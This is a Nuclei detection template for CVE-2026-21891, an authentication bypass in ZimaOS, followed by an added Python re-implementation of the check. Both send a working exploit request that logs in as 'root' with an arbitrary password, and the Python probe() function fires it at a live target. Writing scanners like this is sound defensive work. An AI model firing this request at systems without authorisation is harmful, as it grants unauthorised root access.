id: CVE-2026-21891

info:
  name: ZimaOS - Authentication Bypass
  author: DhiyaneshDk
  severity: critical
  description: |
    ZimaOS <= 1.5.0 contains a broken authentication vulnerability caused by improper password validation for known system service accounts in the login function, letting attackers authenticate as these accounts with any password. Exploitation requires knowledge of common usernames.
  impact: |
    Attackers can gain authenticated access to system service accounts without valid passwords, potentially compromising the system.
  remediation: |
    Update to a fixed version when available or apply patches to properly validate passwords for system service accounts.
  reference:
    - https://github.com/IceWhaleTech/ZimaOS/security/advisories/GHSA-xj93-qw9p-jxq4
    - https://nvd.nist.gov/vuln/detail/CVE-2026-21891
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-21891
    cwe-id: CWE-287
    epss-score: 0.11368
    epss-percentile: 0.93688
    cpe: cpe:2.3:o:zimaspace:zimaos:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"ZimaOS"
    product: zimaos
    vendor: zimaspace
  tags: cve,cve2026,zimaos,auth-bypass,broken-auth,vkev

http:
  - raw:
      - |
        POST /v1/users/login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/plain, */*
        Content-Type: application/json
        Origin: {{RootURL}}
        Referer: {{RootURL}}/

        { "username": "root", "password": "anything" }

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "success"
          - "username"
          - "created_at"
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a01aab48e187bf00fb0296187d73576fcc84e4002c8822b125602027d60b225f0221008c81e65c4c32fe8b69ff82bd561c49edf10585e51248341bd1d54d73f90e55c5:922c64590222798bb761d5b6d8e72950
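The following is an added example, not part of the Nuclei template above and not code from the ZimaOS project: a stand-alone Python re-implementation of the template's request and of its three AND-ed matchers (body words, content type, HTTP 200), so the detection logic can be unit-tested offline. The two sample responses are constructed for illustration; the real ZimaOS login response body is not shown on this page beyond the three words the template matches on. The `probe()` helper performs the live request with only the standard library.

```python
"""Re-implementation of the CVE-2026-21891 Nuclei check (added example, not the template itself)."""
import json
import urllib.error
import urllib.request

LOGIN_PATH = "/v1/users/login"
BODY_WORDS = ("success", "username", "created_at")   # all must appear (condition: and)

# Constructed sample responses for offline testing. Field layout is illustrative only;
# the template only tells us that a vulnerable reply is HTTP 200 JSON containing these words.
VULNERABLE_RESPONSE = (
    200,
    "application/json; charset=utf-8",
    json.dumps({"success": 200, "data": {"username": "root",
                                         "created_at": "2026-01-01T00:00:00Z"}}),
)
# A fixed build rejects the bogus password; note "success" still appears in the body,
# which is why the status and the other two words are required before we call it vulnerable.
PATCHED_RESPONSE = (
    401,
    "application/json",
    json.dumps({"success": 401, "message": "invalid username or password"}),
)


def build_login_request(root_url: str, username: str = "root",
                        password: str = "anything") -> urllib.request.Request:
    """Mirror the template's raw request: JSON login for a known service account
    with a password that cannot be valid."""
    root_url = root_url.rstrip("/")
    body = json.dumps({"username": username, "password": password}).encode()
    headers = {
        "Accept": "application/json, text/plain, */*",
        "Content-Type": "application/json",
        "Origin": root_url,
        "Referer": root_url + "/",
    }
    return urllib.request.Request(root_url + LOGIN_PATH, data=body,
                                  headers=headers, method="POST")


def matches(status: int, content_type: str, body: str) -> bool:
    """Apply the template's matchers with matchers-condition: and.
    Nuclei word matchers are case-sensitive substring checks, reproduced here."""
    body_ok = all(word in body for word in BODY_WORDS)
    content_type_ok = "application/json" in content_type
    status_ok = status == 200
    return body_ok and content_type_ok and status_ok


def probe(root_url: str, timeout: float = 10.0) -> bool:
    """Send the single request (max-request: 1) and evaluate the matchers.
    Non-2xx replies are raised by urllib as HTTPError; they still carry a body
    and must be fed to the same matcher logic rather than treated as errors."""
    req = build_login_request(root_url)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return matches(resp.status, resp.headers.get("Content-Type", ""),
                           resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:
        return matches(err.code, err.headers.get("Content-Type", ""),
                       err.read().decode("utf-8", "replace"))


if __name__ == "__main__":
    import sys
    # Usage: python check.py http://target:port   (run only against hosts you are authorised to test)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    if target:
        print("vulnerable" if probe(target) else "not vulnerable")
    else:
        print("offline self-check:", matches(*VULNERABLE_RESPONSE), matches(*PATCHED_RESPONSE))
```

Two caveats for anyone running this outside Nuclei: a match means you have just obtained a real authenticated session on the target, so use it only with authorisation; and the check cannot distinguish a bypass from a genuinely valid password, which is why the password sent must be one that no real account could hold.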